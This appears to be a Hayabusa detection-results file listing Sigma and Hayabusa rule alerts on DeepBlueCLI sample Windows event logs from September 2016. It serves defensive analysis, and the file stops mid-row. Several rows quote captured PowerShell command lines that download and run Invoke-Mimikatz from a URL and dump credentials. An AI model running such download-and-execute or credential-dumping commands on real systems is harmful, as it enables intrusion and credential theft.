Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:14:19.540 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9a4 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:14:19.540 +00:00,IE10Win7,4688,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:14:19.540 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:14:19.540 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:14:19.540 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:14:19.540 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:14:19.540 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:20:41.106 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:20:41.106 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb80 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:20:41.106 +00:00,IE10Win7,4688,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:20:41.106 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:20:41.106 +00:00,IE10Win7,4688,high,,Suspicious Program Names,,rules/sigma/process_creation_builtin/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:20:41.106 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:20:41.106 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:20:41.106 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:20:41.106 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:20:56.173 +00:00,IE10Win7,4688,high,Exec,Suspicious PowerShell Download and Execute Pattern,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download_patterns.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:20:56.173 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe ""IEX (New-Object Net.WebClient).DownloadString('http://eic.me/17'); Invoke-Mimikatz -DumpCreds"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdb8 | User: IEUser | LID: 0x6590f",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:20:56.173 +00:00,IE10Win7,4688,high,,PowerShell Web Download and Execution,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_iex.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:20:56.173 +00:00,IE10Win7,4688,medium,Exec,PowerShell Download from URL,,rules/sigma/process_creation_builtin/proc_creation_win_powershell_download.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:20:56.173 +00:00,IE10Win7,4688,medium,CredAccess,Mimikatz Command Line,,rules/sigma/process_creation_builtin/proc_creation_win_mimikatz_command_line.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:20:56.173 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:20:56.173 +00:00,IE10Win7,4688,medium,Exec,Windows Suspicious Use Of Web Request in CommandLine,,rules/sigma/process_creation_builtin/proc_creation_win_susp_web_request_cmd.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 00:20:56.173 +00:00,IE10Win7,4688,medium,,PowerShell Web Download,,rules/sigma/process_creation_builtin/proc_creation_win_susp_powershell_download_cradles.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 01:00:00.931 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0xd78 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 01:03:08.691 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 01:28:55.331 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x300 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 01:28:55.343 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x59c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 03:38:31.391 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 03:38:31.558 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc30 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 03:38:32.423 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x304 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 03:38:32.538 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x370 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 03:38:43.023 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xce4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 03:44:04.646 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x380 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 03:44:04.653 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x7dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:48:41.591 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:48:41.680 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x23c | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:48:42.006 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x9d4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:48:42.440 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\makecab.exe"" C:\Windows\Logs\CBS\CbsPersist_20160920124842.log C:\Windows\Logs\CBS\CbsPersist_20160920124842.cab | Path: C:\Windows\System32\makecab.exe | PID: 0x914 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:48:42.724 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xfe0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:48:46.672 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x718 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:48:48.961 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:48:48.961 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:48:51.111 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:48:54.436 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb70 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 12:50:15.072 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:13.234 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logoff | Path: C:\Windows\System32\gpscript.exe | PID: 0xc20 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:23.000 +00:00,IE10Win7,6006,info,,Event Log Service Stopped,,rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 13:07:41.000 +00:00,IE10Win7,6005,info,,Event Log Service Started,,rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx +2016-09-20 13:07:41.484 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:41.484 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:41.578 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:41.578 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:41.625 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:41.625 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:41.781 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:41.781 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:41.812 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:41.812 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:41.843 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:41.843 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:43.781 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:43.781 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:44.015 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:44.015 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:44.179 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Path: C:\Windows\System32\dllhost.exe | PID: 0x6e8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:44.429 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:44.429 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:44.757 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\dllhost.exe /Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:49.132 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:49.132 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:55.023 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:58.039 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x9a0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:58.054 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:58.101 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: gpscript.exe /Logon | Path: C:\Windows\System32\gpscript.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:58.226 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:07:59.540 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xb84 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:08:00.110 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Wallpaper\autologon.bat"" "" | Path: C:\Windows\System32\cmd.exe | PID: 0xc1c | User: IEUser | LID: 0x6793c",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:08:00.615 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\wallpaper\bginfo.exe C:\wallpaper\bgconfig.bgi /timer:0 | Path: C:\Wallpaper\Bginfo.exe | PID: 0xc38 | User: IEUser | LID: 0x6793c,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:08:00.615 +00:00,IE10Win7,4688,medium,Exec | Evas,False Sysinternals Suite Tools,,rules/sigma/process_creation_builtin/proc_creation_win_false_sysinternalsuite.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:08:01.982 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0xc5c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:08:05.144 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:08:05.144 +00:00,IE10Win7,4688,high,Evas,Suspicious Svchost Process,,rules/sigma/process_creation_builtin/proc_creation_win_susp_svchost.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:10:32.160 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\wuauclt.exe"" /RunHandlerComServer | Path: C:\Windows\System32\wuauclt.exe | PID: 0x3a0 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:10:43.535 +00:00,IE10Win7,4688,low,Evas,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation_builtin/proc_creation_win_proc_wrong_parent.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:20:59.082 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\RunDll32.exe"" ""C:\Windows\system32\WerConCpl.dll"", LaunchErcApp -responsepester | Path: C:\Windows\System32\rundll32.exe | PID: 0x87c | User: IEUser | LID: 0x6796c",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:20:59.082 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:25:15.535 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\rundll32.exe aepdu.dll,AePduRunUpdate | Path: C:\Windows\System32\rundll32.exe | PID: 0xa00 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:25:15.535 +00:00,IE10Win7,4688,medium,,Rundll32 From Abnormal Drive,,rules/sigma/process_creation_builtin/proc_creation_win_rundll32_not_from_c_drive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 13:34:40.236 +00:00,IE10Win7,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx +2016-09-20 14:02:21.413 +00:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe 